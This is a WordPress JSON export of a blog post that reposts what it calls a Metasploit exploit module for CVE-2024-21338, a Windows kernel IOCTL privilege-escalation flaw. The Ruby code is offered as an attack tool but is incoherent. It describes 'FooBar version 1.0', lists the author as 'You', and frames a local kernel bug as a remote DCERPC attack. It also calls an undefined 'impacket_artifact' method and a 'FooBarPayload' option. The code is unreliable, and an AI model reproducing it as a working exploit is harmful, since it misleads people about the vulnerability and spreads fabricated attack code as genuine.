{"id":55808,"date":"2024-04-03T02:19:48","date_gmt":"2024-04-02T22:19:48","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/177869\/mswinioctl-access.txt"},"modified":"2024-04-03T02:19:48","modified_gmt":"2024-04-02T22:19:48","slug":"microsoft-windows-10-0-17763-5458-privilege-escalation","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/microsoft-windows-10-0-17763-5458-privilege-escalation\/","title":{"rendered":"Microsoft Windows 10.0.17763.5458 Privilege Escalation"},"content":{"rendered":"<p>#############################################<br \/># Exploit Title : EXPLOIT Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability CVE-2024-21338 #<br \/>#<br \/># This module requires Metasploit: https:\/\/metasploit.com\/download<br \/>#<br \/># Author : E1.Coders #<br \/># #<br \/># Contact : E1.Coders [at] Mail [dot] RU #<br \/># #<br \/># Security Risk : High #<br \/># #<br \/># #<br \/>#############################################<\/p>\n<p>require &#8216;msf\/core&#8217;<\/p>\n<p>class MetasploitModule &lt; Msf::Exploit::Remote<br \/>Rank = NormalRanking<\/p>\n<p>include Msf::Exploit::Remote::DCERPC<br \/>include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact<\/p>\n<p>def initialize(info = {})<br \/>super(<br \/>update_info(<br \/>info,<br \/>&#8216;Name&#8217; =&gt; &#8216;CVE-2024-21338 Exploit&#8217;,<br \/>&#8216;Description&#8217; =&gt; &#8216;This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.&#8217;,<br \/>&#8216;Author&#8217; =&gt; &#8216;You&#8217;,<br \/>&#8216;License&#8217; =&gt; MSF_LICENSE,<br \/>&#8216;References&#8217; =&gt; [<br \/>[&#8216;CVE&#8217;, &#8216;2024-21338&#8217;]<br \/>]<br \/>)<br \/>)<\/p>\n<p>register_options(<br \/>[<br \/>OptString.new(&#8216;RHOST&#8217;, [true, &#8216;The target address&#8217;, &#8216;127.0.0.1&#8217;]),<br \/>OptPort.new(&#8216;RPORT&#8217;, [true, &#8216;The target port&#8217;, 1234])<br \/>]<br \/>)<br \/>end<\/p>\n<p>def check<br \/>connect<\/p>\n<p>begin<br \/>impacket_artifact(dcerpc_binding(&#8216;ncacn_ip_tcp&#8217;), &#8216;FooBar&#8217;)<br \/>rescue Rex::Post::Meterpreter::RequestError<br \/>return Exploit::CheckCode::Safe<br \/>end<\/p>\n<p>Exploit::CheckCode::Appears<br \/>end<\/p>\n<p>def exploit<br \/>connect<\/p>\n<p>begin<br \/>impacket_artifact(<br \/>dcerpc_binding(&#8216;ncacn_ip_tcp&#8217;),<br \/>&#8216;FooBar&#8217;,<br \/>datastore[&#8216;FooBarPayload&#8217;]<br \/>)<br \/>rescue Rex::Post::Meterpreter::RequestError<br \/>fail_with Failure::UnexpectedReply, &#8216;Unexpected response from impacket_artifact&#8217;<br \/>end<\/p>\n<p>handler<br \/>disconnect<br \/>end<br \/>end<\/p>\n<p>#refrence : https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2024-21338<\/p>\n","protected":false},"excerpt":{"rendered":"<p>############################################## Exploit Title : EXPLOIT Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability CVE-2024-21338 ### This module requires Metasploit: https:\/\/metasploit.com\/download## Author : E1.Coders ## ## Contact : E1.Coders [at] Mail [dot] RU ## ## Security Risk : High ## ## ############################################## require &#8216;msf\/core&#8217; class MetasploitModule &lt; Msf::Exploit::RemoteRank = NormalRanking include Msf::Exploit::Remote::DCERPCinclude Msf::Exploit::Remote::DCERPC::MS08_067::Artifact def &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-55808","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55808","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=55808"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55808\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=55808"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=55808"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=55808"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}